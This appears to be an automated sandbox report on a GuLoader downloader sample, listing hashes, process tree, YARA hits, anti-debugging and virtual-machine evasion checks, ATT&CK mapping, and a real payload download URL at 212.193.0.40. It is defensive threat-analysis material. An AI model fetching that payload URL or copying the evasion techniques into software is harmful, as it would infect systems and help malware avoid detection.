Edit tour

Windows Analysis Report
xKBLVUHoY6.exe

Overview

General Information

Sample Name:	xKBLVUHoY6.exe
Analysis ID:	679245
MD5:	6e0bf5d5220fbe4f7245653a259c7dad
SHA1:	f077644ac1eb17aa811f4805e1f5f546b4f6166f
SHA256:	2914eb3edbf9dadb98429173fb1c1b5954742b10e49b1f804024e6448028f73e
Infos:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

xKBLVUHoY6.exe (PID: 8532 cmdline: "C:\Users\user\Desktop\xKBLVUHoY6.exe" MD5: 6E0BF5D5220FBE4F7245653A259C7DAD)

CasPol.exe (PID: 8740 cmdline: "C:\Users\user\Desktop\xKBLVUHoY6.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://212.193.0.40/redi_oXifXcNSpB69.bin"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1475620205.0000000003360000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000000.817511706.0000000001230000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.5715131175.0000000001230000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: xKBLVUHoY6.exe

Virustotal: Detection: 36%

Perma Link

Antivirus detection for URL or domain

Source: http://212.193.0.40/redi_oXifXcNSpB69.binn	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.bin~	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.bin	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.binsvY	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.bing	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.binH	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.binoe	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.binZ	Avira URL Cloud: Label: malware
Source: http://212.193.0.40/redi_oXifXcNSpB69.binalm	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://212.193.0.40/redi_oXifXcNSpB69.bin

Virustotal: Detection: 15%

Perma Link

Source: 00000000.00000002.1475620205.0000000003360000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://212.193.0.40/redi_oXifXcNSpB69.bin"}

Source: xKBLVUHoY6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: xKBLVUHoY6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://212.193.0.40/redi_oXifXcNSpB69.bin

Source: global traffic

TCP traffic: 192.168.11.20:49727 -> 212.193.0.40:80

Source: Joe Sandbox View

ASN Name: ASBAXETNRU ASBAXETNRU

Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40
Source: unknown	TCP traffic detected without corresponding DNS query: 212.193.0.40

Source: CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.bin
Source: CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.binH
Source: CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.binZ
Source: CasPol.exe, 00000003.00000002.5717397048.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.binalm
Source: CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.bing
Source: CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.binn
Source: CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.binoe
Source: CasPol.exe, 00000003.00000002.5717397048.0000000001520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.binsvY
Source: CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.193.0.40/redi_oXifXcNSpB69.bin~
Source: xKBLVUHoY6.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xKBLVUHoY6.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: xKBLVUHoY6.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xKBLVUHoY6.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xKBLVUHoY6.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: xKBLVUHoY6.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xKBLVUHoY6.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: xKBLVUHoY6.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: xKBLVUHoY6.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: xKBLVUHoY6.exe	String found in binary or memory: http://ocsp.digicert.com0X

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056A8

Source: xKBLVUHoY6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034F7

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_00406BFE		0_2_00406BFE
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_6E551BFF		0_2_6E551BFF

Source: xKBLVUHoY6.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: xKBLVUHoY6.exe

Static PE information: invalid certificate

Source: xKBLVUHoY6.exe

Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

File read: C:\Users\user\Desktop\xKBLVUHoY6.exe

Jump to behavior

Source: xKBLVUHoY6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\xKBLVUHoY6.exe "C:\Users\user\Desktop\xKBLVUHoY6.exe"
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xKBLVUHoY6.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xKBLVUHoY6.exe"	Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

0_2_004034F7

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lansat

Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

File created: C:\Users\user\AppData\Local\Temp\nsp4C13.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winEXE@4/4@0/1

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404954

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:120:WilError_03

Source: xKBLVUHoY6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1475620205.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.817511706.0000000001230000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5715131175.0000000001230000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_6E5530C0 push eax; ret	0_2_6E5530EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0123154E push ds; retf	3_2_012315DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_012311C5 push esp; iretd	3_2_012311C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_012349CC push ebp; ret	3_2_012349CD

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Code function: 0_2_6E551BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6E551BFF

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

File created: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: xKBLVUHoY6.exe, 00000000.00000002.1475805085.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: xKBLVUHoY6.exe, 00000000.00000002.1475805085.0000000003461000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.5718346627.00000000015D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000003.00000002.5718346627.00000000015D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=HTTP://212.193.0.40/REDI_OXIFXCNSPB69.BIN

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	API call chain: ExitProcess graph end node			graph_0-4814
Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	API call chain: ExitProcess graph end node			graph_0-4818

Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: xKBLVUHoY6.exe, 00000000.00000002.1475805085.0000000003461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000003.00000002.5718346627.00000000015D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=http://212.193.0.40/redi_oXifXcNSpB69.bin
Source: CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.5718112034.0000000001545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: xKBLVUHoY6.exe, 00000000.00000002.1475805085.0000000003461000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.5718346627.00000000015D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: xKBLVUHoY6.exe, 00000000.00000002.1476265010.0000000004F39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Code function: 0_2_6E551BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6E551BFF

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xKBLVUHoY6.exe"

Jump to behavior

Source: C:\Users\user\Desktop\xKBLVUHoY6.exe

0_2_004034F7

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	4 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xKBLVUHoY6.exe	37%	Virustotal		Browse
xKBLVUHoY6.exe	6%	Metadefender		Browse
xKBLVUHoY6.exe	12%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://212.193.0.40/redi_oXifXcNSpB69.binn	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.bin~	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.bin	16%	Virustotal		Browse
http://212.193.0.40/redi_oXifXcNSpB69.bin	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.binsvY	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.bing	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.binH	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.binoe	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.binZ	100%	Avira URL Cloud	malware
http://212.193.0.40/redi_oXifXcNSpB69.binalm	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://212.193.0.40/redi_oXifXcNSpB69.bin	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
